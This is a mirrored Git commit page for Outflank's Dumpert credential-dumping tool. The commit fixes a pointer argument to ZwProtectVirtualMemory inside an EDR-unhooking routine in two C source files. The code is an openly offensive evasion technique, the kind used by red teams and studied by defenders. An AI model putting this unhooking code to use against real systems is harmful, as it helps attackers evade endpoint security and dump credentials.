Mirrors/outflanknl-dumpert
1
0
Fork 0
mirror of https://github.com/outflanknl/Dumpert.git synced 2026-06-08 08:35:19 +00:00
Code Issues Packages Projects Releases Wiki Activity

ZwProtectVirtualMemory Bugfix

Browse Source
This commit is contained in:
Cn33liz
2019-07-05 22:33:39 +02:00
parent b895173983
commit 3add4d10af
3 changed files with 6 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Dumpert-Aggressor/Outflank-Dumpert.bin
BIN
View File
Binary file not shown.
Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c
+3 -2
View File
@@ -40,9 +40,10 @@ BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) {
LPVOID lpProcAddress = GetProcAddress(LoadLibrary(L"ntdll.dll"), pWinVerInfo->lpApiCall);
LPVOID lpBaseAddress = lpProcAddress;
ULONG OldProtection, NewProtection;
SIZE_T uSize = 10;
NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
if (status != STATUS_SUCCESS) {
return FALSE;
}
@@ -52,7 +53,7 @@ BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) {
return FALSE;
}
status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, OldProtection, &NewProtection);
status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, OldProtection, &NewProtection);
if (status != STATUS_SUCCESS) {
return FALSE;
}
Dumpert/Outflank-Dumpert/Dumpert.c
+3 -2
View File
@@ -44,9 +44,10 @@ BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) {
printf(" [+] %s System call nr is: 0x%x\n", pWinVerInfo->lpApiCall, AssemblyBytes[4]);
printf(" [+] Unhooking %s.\n", pWinVerInfo->lpApiCall);
LPVOID lpBaseAddress = lpProcAddress;
ULONG OldProtection, NewProtection;
SIZE_T uSize = 10;
NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
if (status != STATUS_SUCCESS) {
wprintf(L" [!] ZwProtectVirtualMemory failed.\n");
return FALSE;
@@ -58,7 +59,7 @@ BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) {
return FALSE;
}
status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, OldProtection, &NewProtection);
status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, OldProtection, &NewProtection);
if (status != STATUS_SUCCESS) {
wprintf(L" [!] ZwProtectVirtualMemory failed.\n");
return FALSE;